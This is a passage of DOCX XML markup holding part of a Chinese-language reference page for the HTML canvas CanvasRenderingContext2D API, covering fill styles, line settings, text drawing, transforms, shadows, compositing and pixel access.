      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在这条路径中。否则，如果一个圆按顺时针方向画，另一个按逆时针方向画，定义的就是一个圆环的形状，小圆内部的点则在路径之外。</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clip()</w:t>
      </w:r>
      <w:r>
        <w:t>对包含的定义也是这样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>颜色、渐变以及图案</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对一条路径填充或描边时，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>fill</w:t>
      </w:r>
      <w:r>
        <w:t>Style</w:t>
      </w:r>
      <w:r>
        <w:t>属性来定义线条或填充区域的渲染方式。这两个属性以及定义渐变及图案的</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasPattern</w:t>
      </w:r>
      <w:r>
        <w:t>对象都支持</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>格式的颜色字符串。创建渐变可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>createLinearGradient()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>createRadialGradient()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，创建图案可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>createPattern()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>符号定义一种不透明的颜色，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>"#RRGGBB"</w:t>
      </w:r>
      <w:r>
        <w:t>格式的字符串，其中</w:t>
      </w:r>
      <w:r>
        <w:t>RR</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>GG</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>BB</w:t>
      </w:r>
      <w:r>
        <w:t>是十六进制数字，定义颜色的红、绿、蓝分量，取值在</w:t>
      </w:r>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>FF</w:t>
      </w:r>
      <w:r>
        <w:t>之间。例如，亮红色是</w:t>
      </w:r>
      <w:r>
        <w:t>"#FF0</w:t>
      </w:r>
      <w:r>
        <w:t>000"</w:t>
      </w:r>
      <w:r>
        <w:t>。要定义部分透明的颜色，可使用</w:t>
      </w:r>
      <w:r>
        <w:t>"rgba(R,G,B,A)"</w:t>
      </w:r>
      <w:r>
        <w:t>格式的字符串。在这种格式中，</w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>定义颜色的红、绿、蓝分量，采用十进制，值在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>255</w:t>
      </w:r>
      <w:r>
        <w:t>之间，</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>为一个浮点数，定义</w:t>
      </w:r>
      <w:r>
        <w:t>alpha</w:t>
      </w:r>
      <w:r>
        <w:t>（透明度）分量，值在</w:t>
      </w:r>
      <w:r>
        <w:t>0.0</w:t>
      </w:r>
      <w:r>
        <w:t>（完全透明）～</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>（完全不透明）之间。比如，半透明的亮红色是</w:t>
      </w:r>
      <w:r>
        <w:t>"rgba(255,0,0,0.5)"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>线宽、线帽以及线的连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>画布有几个属性用于定义线条如何绘制。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>lineWidth</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义线条的宽度，用</w:t>
      </w:r>
      <w:r>
        <w:t>lineCap</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义线条端点的样式，以及用</w:t>
      </w:r>
      <w:r>
        <w:t>lineJoin</w:t>
      </w:r>
      <w:r>
        <w:t>属性来定义多条线条之间</w:t>
      </w:r>
      <w:r>
        <w:t>如何连接。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>画矩形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>strokeRect()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>fillRect()</w:t>
      </w:r>
      <w:r>
        <w:t>来给一个矩形描边或填充，另外，也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>clearRect()</w:t>
      </w:r>
      <w:r>
        <w:t>来清空一个矩形区域。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>画图像</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>中，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素或</w:t>
      </w:r>
      <w:r>
        <w:t>Image()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数来定义图像。（更多细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:t>的参考页面。）＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素或＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素也可以用做图像资源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来将一幅图像绘制到画布中，在大多数通用形式下，这个方法允许从源图像中任意选取一个矩形区域，经过缩放之后绘制到画布中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>画文字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>illText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法绘制一段文字，</w:t>
      </w:r>
      <w:r>
        <w:t>strokeText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法绘制一段描边的文字。</w:t>
      </w:r>
      <w:r>
        <w:t>font</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义使用的字体，它的值应该是一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>字体说明字符串。</w:t>
      </w:r>
      <w:r>
        <w:t>textAlign</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义文字在传入的水平方向上是左对</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>齐、居中还是右对齐，</w:t>
      </w:r>
      <w:r>
        <w:t>textBaseline</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义文字在传入的垂直方向上的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>坐标空间与转换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>默认情况下，画布的坐标空间的原点（</w:t>
      </w:r>
      <w:r>
        <w:t>0,0</w:t>
      </w:r>
      <w:r>
        <w:t>）位于画布的左上角，</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的值向右递增，</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>的值向下递增。画布的</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>的最大坐标值，这个坐标空间中的基本单位一般对应屏幕上的一个像素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以定</w:t>
      </w:r>
      <w:r>
        <w:t>义自己的坐标空间，之后，为画布的绘图方法传入的坐标会自动转换。自定义坐标空间的方法有</w:t>
      </w:r>
      <w:r>
        <w:t>translate()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>scale()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>rotate()</w:t>
      </w:r>
      <w:r>
        <w:t>，它们将影响画面的转换矩阵（</w:t>
      </w:r>
      <w:r>
        <w:t>transformation matrix</w:t>
      </w:r>
      <w:r>
        <w:t>）。由于坐标空间可以像这样转换，因此为像</w:t>
      </w:r>
      <w:r>
        <w:t>lineTo()</w:t>
      </w:r>
      <w:r>
        <w:t>这样的方法传入的坐标不能用像素来度量，并且画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>使用浮点数来代替整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>阴影</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CanvasRenderingContext 2D</w:t>
      </w:r>
      <w:r>
        <w:t>可以给画的任何东西自动添加阴影。阴影的颜色由</w:t>
      </w:r>
      <w:r>
        <w:t>shadowColor</w:t>
      </w:r>
      <w:r>
        <w:t>定义，偏移量由</w:t>
      </w:r>
      <w:r>
        <w:t>shadowOffsetX</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:t>adowOffsetY</w:t>
      </w:r>
      <w:r>
        <w:t>定义。另外，阴影边缘的羽化程度可以由</w:t>
      </w:r>
      <w:r>
        <w:t>shadowBlur</w:t>
      </w:r>
      <w:r>
        <w:t>来设置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>影像合成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通常情况下，当在画布上绘图时，新画的图像会出现在之前绘制的内容的上面，并根据其透明度，部分或全部遮住旧的内容。处理新像素与旧像素的混合的过程称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>影像合成</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，可以通过为</w:t>
      </w:r>
      <w:r>
        <w:t>globalCompositeOperation</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定不同的值来改变画布合成像素的方式。比如，可以设置这个值让新画的图像出现在现有图像之下。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下表列出了</w:t>
      </w:r>
      <w:r>
        <w:t>globalCompositeOperation</w:t>
      </w:r>
      <w:r>
        <w:t>属性允许的值及其含义。表格中</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>源</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>sour</w:t>
      </w:r>
      <w:r>
        <w:t>ce</w:t>
      </w:r>
      <w:r>
        <w:t>）指的是正要画到画布上的像素，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>目标</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>destination</w:t>
      </w:r>
      <w:r>
        <w:t>）指画布上现有的像素，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结果</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>）指源与目标混合之后的像素。在公式中，字母</w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>代表源像素，</w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>代表目标像素，</w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>代表结果像素，</w:t>
      </w:r>
      <w:r>
        <w:t>α</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4Text"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>代表源像素的阿尔法通道（透明度），</w:t>
      </w:r>
      <w:r>
        <w:t>α</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4Text"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>代表目标像素的阿尔法通道：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251747328" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4054415" cy="3230592"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="92" name="00092.jpeg" descr="000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2.jpeg" descr="00092.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4054415" cy="3230592"/>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48352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4097547" cy="1971135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="93" name="00093.jpeg" descr="000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3.jpeg" descr="00093.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId96"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4097547" cy="1971135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>保存绘图状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>restore()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来保存或还原一个</w:t>
      </w:r>
      <w:r>
        <w:t>Can</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>vasRenderingContext 2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象的状态。</w:t>
      </w:r>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>将当前状态压入栈中，</w:t>
      </w:r>
      <w:r>
        <w:t>restore()</w:t>
      </w:r>
      <w:r>
        <w:t>从栈的顶部弹出最近保存的状态，并将根据它的值设</w:t>
      </w:r>
      <w:r>
        <w:t>置当前绘图状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CanvasRenderingContext 2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象的所有属性（</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>属性除外，它是一个常量）都可在绘图状态中保存。转换矩阵和裁剪区域也是状态的一部分，但当前路径和当前点不是。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>像素操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法允许查询画布的原始像素，</w:t>
      </w:r>
      <w:r>
        <w:t>putImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>允许设置单个像素的值。如果你想通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>进行图像处理，这两个方法将非常有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Canvas canvas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用于绘图的</w:t>
      </w:r>
      <w:r>
        <w:t>Canvas</w:t>
      </w:r>
      <w:r>
        <w:t>元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>any fllStyle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前用于填充路径的颜色、图案或渐变。这个属性的值可以是</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>颜色字符串，也可以是一个</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasPattern</w:t>
      </w:r>
      <w:r>
        <w:t>对象。默认的填充样式是纯黑色。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>string font</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>绘制文本时使用的字体，值为一段字符串，格式与</w:t>
      </w:r>
      <w:r>
        <w:t>CSSfont</w:t>
      </w:r>
      <w:r>
        <w:t>属性格式相同。默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>"10px sans-serif"</w:t>
      </w:r>
      <w:r>
        <w:t>。如果字体尺寸使用</w:t>
      </w:r>
      <w:r>
        <w:t>"em"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"ex"</w:t>
      </w:r>
      <w:r>
        <w:t>等单位或</w:t>
      </w:r>
      <w:r>
        <w:t>"larger"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"smaller"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"bolder"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"lighter"</w:t>
      </w:r>
      <w:r>
        <w:t>等相对关键字，它们将相对当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的实际</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>字体样式进行转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:t>uble globalAlpha</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为画布上的所有内容定义一个额外的透明度。画布上的所有像素的</w:t>
      </w:r>
      <w:r>
        <w:t>alpha</w:t>
      </w:r>
      <w:r>
        <w:t>值将乘以这个值。这个值只能为</w:t>
      </w:r>
      <w:r>
        <w:t>0.0</w:t>
      </w:r>
      <w:r>
        <w:t>（所有内容完全透明）～</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>（默认值，没有额外透明度）之间的一个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string globalCompositeOperation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性指定绘制到画布上的源像素与画布上已经存在的目标像素之间如何结合（或合成）。一般只有在处理部分透明的颜色或设置</w:t>
      </w:r>
      <w:r>
        <w:t>globalAlpha</w:t>
      </w:r>
      <w:r>
        <w:t>属性后这个属性才有用。它的默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>"source-over"</w:t>
      </w:r>
      <w:r>
        <w:t>，其他常用值为</w:t>
      </w:r>
      <w:r>
